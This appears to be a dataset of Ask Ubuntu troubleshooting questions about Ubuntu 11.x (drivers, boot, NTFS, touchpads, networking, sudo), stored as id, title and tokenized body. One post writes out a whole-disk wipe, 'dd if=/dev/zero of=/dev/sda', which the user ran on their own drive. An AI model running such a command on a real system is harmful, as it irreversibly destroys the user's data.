70281	why does my ntfs partition mount as read only ?	until recently both my windows partition ( c : ) and my data partition ( e : ) would mount as read/write . now both seem to only mount as read-only . gparted resize ( error ) ntfsresize v2.0.0 ( libntfs 10:0:0 ) device name : /dev/sda4 ntfs volume version : 3.1 cluster size : 4096 bytes current volume size : 86207623680 bytes ( 86208 mb ) current device size : 86207627264 bytes ( 86208 mb ) new volume size : 78662066688 bytes ( 78663 mb ) checking filesystem consistency ... accounting clusters ... space in use : 62126 mb ( 72.1 % ) collecting resizing constraints ... needed relocations : 1606868 ( 6582 mb ) schedule chkdsk for ntfs consistency check at windows boot time ... resetting $ logfile ... ( this might take a while ) relocating needed data ... error : extended record needed ( 1032 > 1024 ) , not yet supported ! please try to free less space . chkdsk output : checking file system on e : the type of the file system is ntfs . volume label is data . a disk check has been scheduled . windows will now check the disk . 99482 file records processed . 495 large file records processed . 0 bad file records processed . 0 ea records processed . 0 reparse records processed . 104412 index entries processed . 0 unindexed files processed . 99482 security descriptors processed . 2466 data files processed . chkdsk is verifying usn journal ... 4479208 usn bytes processed . usn journal verification completed . windows has checked the file system and found no problems . 84187132 kb total disk space . 60479688 kb in 69969 files . 15520 kb in 2467 indexes . 0 kb in bad sectors . 174336 kb in use by the system . 65536 kb occupied by the log file . 23517588 kb available on disk . 4096 bytes in each allocation unit . 21046783 total allocation units on disk . 5879397 allocation units available on disk . internal info : 9a 84 01 00 00 1b 01 00 fc 1a 01 00 00 00 00 00 ... ... ... ... ... . 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... ... ... ... ... . 42 00 00 00 52 73 5c 77 b0 e7 1d 00 b0 df 1d 00 b ... rs\w ... ... .. fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=8213cc89-2438-41b9-899f-13b4c5b299af / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=45873767-d9ae-4f0c-baab-ffc2726ac24e none swap sw 0 0 checked the drive in gparted , gsmartcontrol and with ntfsfix , all completed successfully , no change . partitions dev/sda1 ntfs winre dev/sda2 ntfs windows c : dev/sda3 extended dev/sda4 ntfs data e : dev/sda5 ext4 ubuntu dev/sda6 linux-swap i am looking for an explanation of : internal info : 9a 84 01 00 00 1b 01 00 fc 1a 01 00 00 00 00 00 ... ... ... ... ... . 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ... ... ... ... ... . 42 00 00 00 52 73 5c 77 b0 e7 1d 00 b0 df 1d 00 b ... rs\w ... ... .. and resetting $ logfile ... ( this might take a while ) relocating needed data ... error : extended record needed ( 1032 > 1024 ) , not yet supported ! please try to free less space .
70287	unable to connect to the internet via lan despite the connection showing as established	i have installed ubuntu 11.10 . i am facing a problem connecting via lan . we have a firewalled network . after entering static ip , gateway , dns , etc. , it shows connection as established but we are unable to use the internet using the wired connection ( lan ) . while checking system testing following error shows under network test : error : root : could not find def gateway info in /proc error : root : could not find default gateway by running route
70289	how to reset gnome 3 settings to default configurations ?	i 'm attempting to reset the panels to the default configuration . instructions exist here , but perhaps this is pertinent only to gnome2 . following the procedure in ocelot seems to have no effect on gnome3 's fallback session panel configuration . any suggestions ? thank you .
70291	slow internet connection with a digicom wireless 11n 300m ( rt2800 )	after upgrading to ubuntu 11.10 the speed of my internet connection has considerably reduced . i surf on internet using a wireless usb adapter digicom wireless 11n 300m which works with rt2800usb driver . the fact is , on the installation cd there 's no tracks of that driver but instead of it there is another one called rt2870 which i tried to load using ndiswraper , but it did not recognize any hardware . i 'm not sure the solution of my problem is simply changing the driver , but i have no other ideas . can anyone help me ?
70296	is there an environment variable that is set for unity ?	my script needs to be able to detect if the unity is being used on top of the gnome de . the only other way i can think of is basically seeing if the config file is there .
70301	how can i stop certain apps from appearing in the dash ?	i would like to hide all items that i do n't need from appearing in app lens . for example : xterm , file roller and the home folder . is this possible ?
70303	ca n't boot after a dd , bios reports no bootable drives	i bought a new computer , removed the windows disk ( as usual ) and installed 2 brand new 3tb drives . installed 11.10 from usb stick , apt-get updates and favorite installs , everything was fine . then i booted from usb stick again and did : dd if=/dev/sda of=/dev/sdb bs=1m and after that i can not boot . bios says i have no bootable drives . do n't even get as far as grub . booting from usb stick sees both drives and the files successfully copied ( so i did not dd the wrong direction ) . it is as if when the second drive was blank the first drive worked , but now that they are identical the bios does not know what to do . update 1 : checking the `` bios confused '' idea i physically disconnected one drive and booted from the other . no joy , on either drive . it is as if the blank drive had something that was helping the boot sequence , and the dd overwrote it ! update 2 : since it is not even getting to grub i thought i would try to recreate the mbr . update-grub just recreated an ( identical ) grub.cfg . grub-install /dev/sda said `` grub-setup : warn : this gpt partition label has no bios boot partition ; embedding wo n't be possible ! '' i do n't think i want to embed anything , just rewrite the mbr . grub-setup /dev/sda said segmentation fault ( core dumped ) update 3 : gave up , did : dd if=/dev/zero of=/dev/sda and reinstalled ubuntu from cd . still wo n't boot ! it is as if the brand new 3tb drives ( seagate , if it matters ) had some little helper boot code on them and when i installed ubuntu it overwrote that . of course it is too late to confirm that now , since both drives were overwritten once i did the dd . has anyone heard of a brand new drive not being really blank ? update 4 : ok now my hypothesis is that my bios can not boot to a gpt partitioned drive , at least not a 3tb one . if i repartition it as msdos it boots , if i go back to gpt it does n't again . happy to post details but do n't know what would be relevant . tia !
70306	can i make the launcher icons smaller than 32 pixels ?	why ca n't the `` launcher '' icons be made smaller ? at the smallest setting , they are still 4 times bigger than they need to be on a 10 '' netbook . the icons in the `` top panel '' are much smaller and we users do n't have a problem selecting them .
70307	desktop lagging and general problems with an ati x1550	so recently i installed ubuntu 11.10 and first thing i always do is checking additional drivers but nothing shows there , and when i go to `` system info '' > `` graphic '' there is `` driver : unknown experience : standard '' , but experience is not even close to standard . i know that amd have bad driver support for linux based os but i am experiencing some bad situations like : `` blank screen '' ( neither unity launch bar or upper taskbar or whatever is showing up , and i ca n't do nothing about it , neither reset or start up system monitor . ) this is very annoying to me and its causing few more problems , it sometimes seems like `` ubuntu is lagging '' . so if you know how to fix that stuff please tell me . thank you .
70309	what happens when i run ln -s pear /tmp/pear-build-`whoami`	i have read this interesting post regarding the installation of php-mongo driver not writeable by the current user mkdir pear ln -s pear /tmp/pear-build-`whoami` /usr/bin/pear config-set cache_dir $ home/pear/cache /usr/bin/pear config-set download_dir $ home/pear/download /usr/bin/pear config-set temp_dir $ home/pear/temp this makes pear compile it in your home directory instead of /tmp . then i ran : pecl install mongo what is the outcome of running the following command ? ln -s pear /tmp/pear-build-`whoami`
70312	how to add access controls to accessibility options ?	we are having issues in our labs where students set the magnifier and a few other settings intentionally to make the system almost unusable . i was thinking about controlling this activity , but disabling it will not solve that issue because there might be people who really need and this also eliminates the options of disabling it at the screen and enabling it back again through console . so i was really wondering can we attach some kind of authentication to this in anyway , so that a lab admin can give access to the person who needs to use this option . or even better is there a way to set it or disable it through the command prompt . keep in mind i am using ubuntu 10.04 .
70321	legacy ati drivers do n't work with a mobility x300	i just installed ubuntu 11.10 on my dell latitude d610 laptop , but obviously hardware accelaration for the integrated ati radeon x300 mobility gfx-chipset does not work . and yes , i did install fglrx packages and yes i did have a look at additional proprietary drivers in system settings ( it 's not listed there ) . and i created a xorg.conf within /etc/x11 and inserted a section for device , subsection driver `` fglrx '' , it still does not work ! ati catalyst control center reports an error ( no appropriate driver installed ) if i try to start it . any ideas ?
70325	how to run application under different user	i am using 11.04 . i have two users . ( user1 and user2 ) . could you please tell if it is possible to run firefox or any other browser with another user 's profile . let say , i am using user2 to access my office network via browser . so while working on user1 , i want to access office network and dont want to switch from user1 . so will it be possible to change few permissions so as to make firefox open only using user2 's profile . so scene would be something like this . 1 ) user1 clicks on firefox launcher 2 ) os asks for user2 's password 3 ) user1 enters user2 's password 4 ) firefox is launched with user2 's profile . ( it loads all configurations from ~/home/user2/.firefox )
70328	dell inspiron 1100 - shows splash screen and remains dark	i have been looking for a solution in the various threads , but nothing 's specific to the dell inspiron 1100 . i am able to boot the laptop using the install disc , and operation seems normal . video works fine and access to the hardware is no problem . when i install ubuntu , replacing any other os , i can run through all the steps all the way to the end getting the message to reboot . once i reboot , the display shows the purple-ish center screen for a moment , without the ubuntu banner , then goes dark , never to return . any suggestions ?
70330	there are no audio devices listed under hardware tab of audio preferences as a result no sound	lspci -v | grep -a7 -i `` audio '' showed the following result 20:01.0 audio device : via technologies , inc. vt8237a/vt8251 hda controller ( rev 10 ) subsystem : asustek computer inc. device 8290 flags : fast devsel , irq 17 memory at < ignored > ( 64-bit , non-prefetchable ) capabilities : < access denied > kernel modules : snd-hda-intel
70332	ubuntu does n't boot after 11.10 upgrade from 11.04	had this problem earlier : crash after update to 11.10 , from 11.04 ; ran the solution and had everything updated and upgraded . i get the following lines after booting with some of the preceding start , stop an [ ok ] lines as the other topic . * checking battery state ... [ 21.640534 ] btusb_intr_complete : hci0 urb ffff88011e948480 failed to resubmit ( 19 ) [ 21.640690 ] btusb_bulk_complete : hci0 urb ffff88011e948cc0 failed to resubmit ( 19 ) [ 21.640734 ] btusb_bulk_complete : hci0 urb ffff88011e9480c0 failed to resubmit ( 19 ) i run tty2 and execute startx to start the gui that i 'm using right now but ubuntu wo n't boot without it .
70333	touchpad freezing on a sony vaio vpcf22s1e	i have a sony vaio vpcf22s1e . i just upgraded from 11.04 to 11.10 . while upgrading ( on downloading packages step ) i lost my internet connection and 2-3 minutes later it resumed . i continued to download packages . and finally , upgrading is completed . now i 'm using 11.10 . but when i log in to ubuntu after 2 minutes the touchpad will be unresponsive . i ca n't use it or the integrated buttons . the disable touchpad while typing option is turned off ( suggested from this answer ) but it did not solve the problem . how can i sure my packages downloaded and installed successfully ? ( as i said , i lost my connection while downloading packages ) ps : i can use usb mouse . pps : i have tried apt-get update , apt-get upgrade
70334	shortcuts in gvim	i 'm using gvim for text editing . some shortcuts are listed as cut +y paste `` +gp however those precise key combinations do not work so i suppose that + and g might be abbreviations for other shortcuts . how can i figure this one out ?
70339	how do i setup dhcp-server interfaces so they are mapped/bridged to each other ?	i have recently setup a dhcp-server on an ubuntu 10.04 server machine . the machine has two interfaces ( eth0 , eth1 ) . i have the dhcp server setup correctly because computers connecting to the network get a dhcp ip address but they can not connect to the outside world . i believe it has to do with the two interfaces being mapped/bridged together . how do i properly map one interface to the other ? is it bridging or mapping ? i see on this page : https : //help.ubuntu.com/community/dhcp3-server they do something like mapping hotplug script grep map eth1 what does that exactly do ? in other places i see the following : iface br0 inet static bridge_ports eth0 eth1 which is better or more efficient ? sorry for all the questions , i 'm a noob at setting up a dchp server . thanks for your help .
70343	why will network manager not allow me save my vpn settings ?	i am trying to configure am openvpn client on my laptop . i am running ubuntu 11.10 64-bit . when i open network manager and import the vpn settings from the premade config folder everything takes . the problem is when i try to save the settings , the save button at the bottom of the network manager applet is greyed out . further more when i hover over the button it says authenticate to save this connection for all users of this machine . the problem is i did not check the box available to all users it was already checked and it is also greyed out and wo n't let me manipulate it . what is going on ? is this a bug or is there something i am missing ? any help would be wonderful .
70347	help restoring partitions	i need some help . i have two partitions : one is / and the other is home . i have an image created with clonezilla of my partition / . if i want a fresh install of ubuntu can i seth the path to my home in the advanced options during setup ? and if i do this , do i must erase the config hidden folder storage in my home partition , just to keep my file , not the actual config ? i 'm a new user of ubuntu .
70351	how many files i can have on a single directory ?	this question is related to this one . i work with animation , which generates a lot of files ( +/- 1,000,000 ) typically stored on a single directory . on mac os x , some bugs came up with more than +/-30,000 files , so i used to break the animation into various directories . on ubuntu , is there a limit for the number of files a single directory can hold ? thank you .
70354	changing brightness does n't work	previously ( on ubuntu 11.04 ) i was able to manually dim my screen further than the fn-keys would allow the screen to dim . i managed to do this through running this command : sudo setpci -s 00:02.0 f4.b=1a i liked to use this command because it would give me fine-grained control of the screen brightness . yet in 11.10 this setting is reset within a couple of seconds for some reason . obviously my little command is a hack , but it used to work . my question is , what alternatives do i have to dim my screen further then the minimum the fn-keys will let me ? i run ubuntu 11.10 on a lenove ideapad s-10 .
70360	what ubuntu 11.10 version , 32-bit or 64-bit , for laptop with core i5 processor 8gb ram ?	i want to install ubuntu 11.10 in my acer aspire 5755g ( with core i5 processor , 8 mb ram and nvidia geforce gt 540m ) i would like to know if i should install the 64-bit or the 32-bit version . thank you for the help .
70362	how do i add update manager to the activities/applications tab within gnome shell ?	i 've been playing with gnome shell , and i like it . but there is one issue i 'm having . when i click on activities , and select applications , i scroll down and i notice that update manager ( and others ( like synaptic ) ) are missing . how do i add update manager ( and others ) to the activities/application within gnome shell ? i 'm using ubuntu 11.10 oneiric .
70363	driver for lexmark x7675 printer	translation : i would like to install a lexmark x7675 printer . the installed ubuntu version is 11.10 . i tried to look on the lexmark website , but i only found drivers for ubuntu versions older than 11.10 . so i tried to install the driver for 10.04 but without success . it ask for password on the terminal , i enter the correct password , but it ask for the password again . it is the administrator password . original ( italian ) : vorrei installare la stampante lexmark x7675 . la versione di ubuntu installata ă¨ la 11.10 . ho provato a cercare nel sito lexmark ma ho trovato versioni precendenti alla 11.10 . ho provato comunque ha installare la 10.04 ma niente da fare . installando i driver da terminale , chiede la password e , anche se corretta , non mi fa proseguire , richiedendomi nuovamente la password . la password ă¨ quella di amministratore .
70367	how can i detect that my ubuntu machine is part of a botnet ?	is there a simple way to check whether or not my ubuntu machine is part of a botnet ?
70372	where can i get adobe acrobat 64 ?	does anybody know where can i get adobe acrobat for 64 bit ubuntu ?
70373	rt2561/rt61 wireless does n't pick up ssid	i just upgraded my parents ' computer from an old ( 9.04 ) ubuntu to 11.10 . and ... 11.10 automatically installs the driver for the wireless adaptor , which is nice . but the computer ca n't pick up the router 's ssid . it 's a brand new netgear 600 router . all the other computers in the house work fine . connecting to it as a hidden network works fine . i 've done wireless setup several times before on various flavors of gnu/linux , and it looks to me like everything is setup properly , but it does n't seem to see the router when disconnected . any suggestions ? lspci -v : 04:01.0 network controller : ralink corp. rt2561/rt61 802.11g pci subsystem : giga-byte technology gn-wp01gs flags : bus master , slow devsel , latency 64 , irq 18 memory at febf8000 ( 32-bit , non-prefetchable ) [ size=32k ] capabilities : < access denied > kernel driver in use : rt61pci kernel modules : rt61pci lshw -c network *-network description : wireless interface product : rt2561/rt61 802.11g pci vendor : ralink corp. physical id : 1 bus info : pci @ 0000:04:01.0 logical name : wlan0 version : 00 serial : 00:24:1d:99:51:20 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt61pci driverversion=3.0.0-12-generic firmware=0.8 latency=64 link=no multicast=yes wireless=ie $ resources : irq:18 memory : febf8000-febfffff ( when disconnected ) iwlist wlan0 scan : wlan0 no scan results ( when connected ) iwlist wlan0 scan : wlan0 scan completed : cell 01 - address : c4:3d : c7:64:13 : b2 channel:6 frequency:2.437 ghz ( channel 6 ) quality=61/70 signal level=-49 dbm encryption key : off essid : '' netgear '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=00000286beb440dc extra : last beacon : 60ms ago ie : unknown : 00074e455447454152 ie : unknown : 010882848b962430486c ie : unknown : 030106 ie : unknown : 2a0104 ie : unknown : 2f0104 ie : unknown : 32040c121860 ie : unknown : 2d1a7c181bffff000000000000000000000000000000000000000000 ie : unknown : 3d1606001300000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : unknown : dd7e0050f204104a00011010440001011041000100103b0001031047001058b973f0430a08bd74f1ea1f36feb45f1021000d4e4554474541522c20496e632e10230008574e44523334303010240008574e4452333430301042000230311054000800060050f204000110110008574e445233343030100800020084103c000103 ie : unknown : dd090010180203f0050000 ie : unknown : dd180050f2020101800003a4000027a4000042435e0062322f00 ie : unknown : dd1e00904c337c181bffff000000000000000000000000000000000000000000 ie : unknown : dd1a00904c3406001300000000000000000000000000000000000000 dmesg , in case that 's any use ... http : //pastebin.com/ebpjsscs
70377	using gedit through ssh connection - should i have gedit installed on the server ?	i wanted to try out using graphical tools over ssh . just to learn a new thing : ) so my understanding is this , i connect like this : ssh -port -x user @ server but i 'm running ubuntu server so it has no gui and thus no gui tools . my understanding is i 've to install gedit on server . but also xserver ? can someone clear up this concepts to me ?
70378	ath error - could not stop rx , dms failed to stop	i 've just installed ubuntu 11.04 on an asus eeebox pc ( eb1012p ) using unetbootin to create a bootable live usb . i did n't notice any errors or failures in the installation process . i 'm working in the terminal screen at ctrl-alt-f2 ( although ctrl-alt-f7 still brings up the desktop gui ) and every two minutes or so , this message interrupts whatever i do : [ 60256.139549 ] ath : dma failed to stop in 10 ms [ ar_cr=0x00000024 ar_diag_sw=0x02000020 ] [ 60256.154150 ] ath : could not stop rx , we could be confusing the dma engine when we start rx up [ 60256.180130 ] ath : dma failed to stop in 10 ms [ ar_cr=0x00000024 ar_diag_sw=0x02000020 ] i really do n't even know how to begin troubleshooting this , or if it 's even a serious problem . it does n't really interrupt any processes i start , it just prints that text out onto my screen in the middle of whatever i 'm typing . i do n't know if it still does this in other ctrl-alt-fx terminals , or in a terminal opened in the gui screen . i 'm going to start by googling the addresses in square brackets and see what they get me . any suggestions or interpretations of these errors are much appreciated ! khiya
70382	installing dvb-t afatech af9035 ?	before i upgrade to ubuntu 11.10 i can install it by this help : http : //www.linuxtv.org/wiki/index.php/ezcap_dvb_t_stick # install_instructions_for_using_alternate_manufacturer_driver but it does n't work anymore ! first why ubuntu support it plug and play like other devices and like windows ? second how can i install it ? i get this error : 1 . install itetech af9035 driver 2 . remove itetech af9035 driver please input your choise : 1 please wait a minute cp : can not stat `api/ . *.o.cmd ' : no such file or directory make -c /lib/modules/3.0.0-12-generic/build subdirs=/home/mahdiar/installer/af903x_src modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.0.0-12-generic' cc [ m ] /home/mahdiar/installer/af903x_src/af903x-core.o in file included from /home/mahdiar/installer/af903x_src/af903x-core.c:1:0 : /home/mahdiar/installer/af903x_src/af903x.h:15:21 : fatal error : dvb-usb.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/mahdiar/installer/af903x_src/af903x-core.o ] error 1 make [ 1 ] : *** [ _module_/home/mahdiar/installer/af903x_src ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.0.0-12-generic' make : *** [ default ] error 2 make error
70389	getting music from my ubuntu one account into ubuntu one music ?	i get the message : credentials not satisfied in ubuntu music . how can i get the downloaded music from ubuntu one into my ubuntu music player . i am using a samsung galaxy s2/ ypur help would be much appreciated .
70392	how do i disable the alt-right click keyboard binding ?	using oneiric 11.10 and unity . i want to disable the context menu that appears with alt+rightclick . alt+rightclick is a much used shortcut in blender . it 's possible to remap keys in blender , but i was hoping to be able to turn it off in ubuntu so that blender get scontrol . i update my blender installation often , so it 's more convenient not to have to change settings every time .
70394	after login , desktop appears but there 's no menu	after login , desktop appears but there 's no menu what can i do to get it back
70395	have two home folders	have just installed 11.10 and gnome shell 3.2 in the past few days and noticed i have two home folders , one `` home '' the other `` home '' ( upper case h ) . they both have the same folders and files in and if i delete a file from one it is also deleted from the other . i can not delete either and would welcome any guidance you can give . thank you . john billot
70399	how to change the login notice on a custom shell ?	i was trying to setup a custom shell for a temp user . sudo usermod -- shell /home/nemo/a temp the contents of a : # ! /bin/bash echo `` test '' unfortunately , on trying to login as user temp , i see this : nautilus login : temp password : last login : sat oct 22 01:33:33 ist 2011 on pts/1 welcome to ubuntu 11.10 ( gnu/linux 3.0.0-12-generic i686 ) * documentation : https : //help.ubuntu.com/ 0 packages can be updated . 0 updates are security updates . test i want to remove the notice that appears .
70400	how can i add a theme to the appearance settings tab in 11.10	eventually , i 'd like to create a proper 11.10 theme and perhaps distribute a package via ppa . to start , i thought i 'd copy one of the `` official '' themes on my local system and start modifying it . after a google search , this question suggested a simple approach : how do i make a theme from scratch for unity ? so i copied /usr/share/themes/ambiance to /usr/share/themes/mikesexperiment , and edited several text files to change the name appropriately . however , the new theme does not show up automatically in the new 11.10 appearance tab under system settings , alongside ambiance and radiance , and i have to use gnome-tweak-tool to select it . how do i get my theme to show up on that list ? thanks , mike .
70401	what happened to the clock indicator ?	i 'm not sure when it happened , but on my 11.10 desktop system , the clock indicator no longer appears . where has the lost time gone ?
70408	how do i eliminate the extra title bar ?	i 'm using oneiric 11.10 , unity 2d , and compiz ( modifying some ccsm settings ) ; i 've activated the effects plug-in on ccsm , and when i apply the changes by typing in the terminal compiz -- replace , i get two title bars in a maximized window rather than only one , the first : the one which is integrated with the unity bar , and the other : the one of the window . here are some pictures : doubletitlebar : howitshouldbe :
70410	no banshee notify osd alerts	ive noticed that on ubuntu 11.10 , the popups in banshee that come up and say the song , and show the album art , have gone away on my system ... is it a glitch or was the feature removed ? and is there any way to get them back ?
70415	how can i install another version of ubuntu on my computer and then uninstall it without messing up my bootup process ?	i have the latest version of ubuntu installed on my laptop . i think of this as my `` production '' version . there are certain things i do n't want to mess with on it . i 'd like a separate sandbox environment on the same machine where i can test out an alpha version or whatever else i consider more risky without messing up my day-to-day work when i need it . i do n't want a vm because i want to be able to , among other things , test my hardware ( e.g . will my camera work ? ) . how can i install another version of ubuntu on the same computer and uninstall it without messing up my system ? ideally i 'd be able to install a new `` sandbox '' version of ubuntu along side ( dual boot ) my existing version be able to boot into my sandbox or production version whenever i want . get rid of my sandbox version whenever i decide to and leave my system just as it was before i installed it . steps 1 & 2 are pretty simple . what i am having trouble with is how to solve for item 3 ? i notice that when i install ubuntu the newest installed version takes over grub . this is a pain because it means that when i delete that partition i am left with a system that does n't work . note : i originally wrote this question a while ago and got some responses then . i have just updated the question and hoping someone has some ideas . thanks !
70418	touchpad detected as both ps/2 mouse and alps glidepoint ... uses ps/2 mouse settings	i have an alps touchpad on my laptop . it never got detected as a toupad in ubuntu < = 11.04 . finally with 11.10 , it finds it as a touchpad and in the mouse config i can see a touchpad tab . changing the settings in the mouse config do nothing . xinput -list gives : virtual core pointer id=2 [ master pointer ( 3 ) ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ↳ hp wireless optical mobile mouse id=9 [ slave pointer ( 2 ) ] ↳ alpsps/2 alps glidepoint id=13 [ slave pointer ( 2 ) ] ↳ ps/2 mouse id=12 [ slave pointer ( 2 ) ] ( hp optical is my external mouse ) when i xinput set-int-prop 12 252 8 3.5 it changes the touchpad sensitivity . so i gather the system is using the ps/2 mouse driver to control the touchpad . disabling the ps/2 mouse disables the touchpad . disabling the alpsps/2 glidepoint does nothing . when i do dmesg | grep -i input i get : [ 17.613230 ] input : ps/2 mouse as /devices/platform/i8042/serio1/input/input11 [ 17.638723 ] input : alpsps/2 alps glidepoint as /devices/platform/i8042/serio1/input/input12 so this makes me thing the ps/2 mouse drivier is loading first , thus using those drivers instead of the touchpad drivers . blacklisting psmouse disables the touchpad . i am now out of ideas on how to get my touchpad behaving as a touchpad . more specifically i want to disable it as i type , increase sensitivity and have side scrolling back . unless someone has other thoughts ... how can i change the order it loads the devices ... make it load the touchpad first ? or is there another solution ?
70422	can i add ( and show ) a user photo ( s ) in lightdm ?	i am wondering if there is an option for adding and showing a user photo in lightdm ?
70423	how do i connect to a server with thunar in xubuntu ?	in ubuntu running gnome 2 you were able to select `` connect to server '' from the places menu and you would get a graphical connection to whatever server you connected to . example : how can you do this from within xubuntu ?
70425	can i prevent ubuntu one sync files over 100 mb for example ?	there are some pdf books over 600 mb , and i 'm not interesting sync that books . can i `` tells '' ubuntu one that do n't sync files over 100 mb without have to move the books of the folders ? ubuntu 10.10
70426	is there a command to print all the terminal processes run by a user ?	i know that # ps -u someuser will print the terminal processes currently being run by a user . is there a way to get all of the past terminal processes that user ever ran when you 're logged in as the root user ?
70427	webcam in asus laptop not recognized	my webcam in asus laptop does not recognise webcam . i installed cheese and say device not found lsusb out put is : bus 001 device 003 : id 0402:5603 ali corp. m5603 video camera controller bus 001 device 004 : id 058f:6254 alcor micro corp. usb hub bus 004 device 002 : id 062a:0000 creative labs optical mouse any solution please swadesh
70428	where can i control desktop background animation ?	in ubuntu versions from 8.04 to 9.04 as i remember there was a tab called `` animation '' when you clicked on `` change desktop background '' which allow you to select : none normal extreme in ubuntu 11.10 i do n't have that control ! ( same in ubuntu 10.04 or newest versions . ) in my ubuntu 11.10 my animation is very static ! i checked for drivers and i do n't have to install any graphical driver . my pc is a dell 1558 with an i3 processor running ubuntu 11.10 and windows 7 home premium 64 bit in both and my graphical card is an intel hd graphics . i do n't know how much graphical ram i think between 512 mb to 1 gb , approximately .
70431	how to edit swap partitions ?	i 've done several installations of different ubuntu versions on my machine one over the other from a cd or live usb , and now i have a mess of swap partitions ( something like 10 of them ) , so i need to eliminate all those and create a new one . i also need to know how to tell the system that the new partition is the one for swap -- otherwise the system wo n't recognize it .
70435	will installing gedit also installs a gui as a dependency in server ?	i want to use gedit using ssh for file editing on my server . i use nano , but for html and css gedit is better . now with sudo apt-get install gedit i get dependencies that are 120mb , that kind seems too big . so did i just install also a complete user interface because of gedit ? i do n't need a user interface ... what did it also install automatically ? should i 've used some other command for installation ?
70436	`` service kdm stop '' yields `` stop : unknown instance : '' and i 'm unable to log out	i 'm trying to restart my x session and neither one of the methods i 'm used to using are working on 11.10 . is this a known bug ?
70442	how do i add myself back as a sudo user ?	i clean-installed ubuntu 11.10 today , and then installed virtualbox . this required me to add myself to the vboxusers group , and since 11.10 seems to no longer have a graphical app to add users to a group , i ran the following command : sudo usermod -g vboxusers stephane this is a problem . i now see what i should have run instead is : sudo usermod -ag vboxusers stephane the end result is i 'm no longer in the groups i should be in . including whatever group is required to run `` sudo '' . when i run any command as sudo now , i get the following : $ sudo ls [ sudo ] password for stephane : stephane is not in the sudoers file . this incident will be reported . is there a way to fix this , or do i need to re-install from scratch again ?
70448	i ca n't see in the dash the filter function	the dash in ubuntu 11.10 should display on the right side a filter function which i ca n't see . i am using a netbook with the usual 10 '' screen with a 1024x600 resolution . any idea how to reduce the icon size to be able to see the filter function area ?
70450	does ubuntu have the equivalent of a registry , especially for desktop gui items ?	i 've seen several references to 'compiz config ' and a 'gnome config ' application that seems to not be installed by default . where do these config applications store their data ? is there a registry similar to windows or are there just some files that i could edit by hand , if i really , really wanted to ?
70457	unity to gnome help	im noob in linux , and recently i have installed ubuntu 11.10 but i 've always work on gnome environment , i really want the gnome environment . someone knows a reliable method to change unity to gnome
70461	installing nvidia-current breaks unity3d	i 've recently downloaded the 11.10 live cd . during testing i found that dragging windows to the edge of the screen had the window properly positioned and resized . after installing this feature no longer works . i found that removing the proprietary drivers ( apt-get remove nvidia-current nvidia-settings ) restores this functionality . should this be reported as a bug in launchpad or is some other approach more appropriate ? -- dave
70464	why is there a minimize button in the unity dashboard ?	if you launch the unity dashboard , there are the traditional 3 buttons in the top-left-hand corner . they look ( something ) like this : x ― □ the x closes the dash . the □ either maximizes or minimizes the dash , depending on it 's current state . the ― does.. ..what exactly ? i know it 's faded out , but could n't it have the same function as close , or almost the same but have the dash fold into the top-left-hand corner ? note : i always have my dash maximized , so to me they are the close , minimize and minimize button . please use the symbols , so i know which one you mean .
70465	acer aspire 5735z wireless not working after upgrade to 11.10	i cant get my wifi card to work at all after upgrading to 11.10 oneiric . i 'm not sure where to start to fix this . ive tried using the additional drivers tool but this shows that no additional drivers are needed . before my upgrade i had a drivers working for the rt2860 chipset . any help on this would be much appreciated ... . thanks jon jon @ ubuntu : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:1d:72 : ec:76 : d5 inet addr:192.168.1.134 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21d:72ff : feec:76d5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7846 errors:0 dropped:0 overruns:0 frame:0 tx packets:7213 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8046624 ( 8.0 mb ) tx bytes:1329442 ( 1.3 mb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:91 errors:0 dropped:0 overruns:0 frame:0 tx packets:91 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:34497 ( 34.4 kb ) tx bytes:34497 ( 34.4 kb ) ive included by dmesg output below [ 0.428818 ] net : registered protocol family 2 [ 0.429003 ] ip route cache hash table entries : 131072 ( order : 8 , 1048576 bytes ) [ 0.430562 ] tcp established hash table entries : 524288 ( order : 11 , 8388608 bytes ) [ 0.436614 ] tcp bind hash table entries : 65536 ( order : 8 , 1048576 bytes ) [ 0.437409 ] tcp : hash tables configured ( established 524288 bind 65536 ) [ 0.437412 ] tcp reno registered [ 0.437431 ] udp hash table entries : 2048 ( order : 4 , 65536 bytes ) [ 0.437482 ] udp-lite hash table entries : 2048 ( order : 4 , 65536 bytes ) [ 0.437678 ] net : registered protocol family 1 [ 0.437705 ] pci 0000:00:02.0 : boot video device [ 0.437892 ] pci : cls 64 bytes , default 64 [ 0.437916 ] simple boot flag at 0x57 set to 0x1 [ 0.438294 ] audit : initializing netlink socket ( disabled ) [ 0.438309 ] type=2000 audit ( 1319243447.432:1 ) : initialized [ 0.440763 ] freeing initrd memory : 13416k freed [ 0.468362 ] hugetlb registered 2 mb page size , pre-allocated 0 pages [ 0.488192 ] vfs : disk quotas dquot_6.5.2 [ 0.488254 ] dquot-cache hash table entries : 512 ( order 0 , 4096 bytes ) [ 0.488888 ] fuse init ( api version 7.16 ) [ 0.488985 ] msgmni has been set to 5890 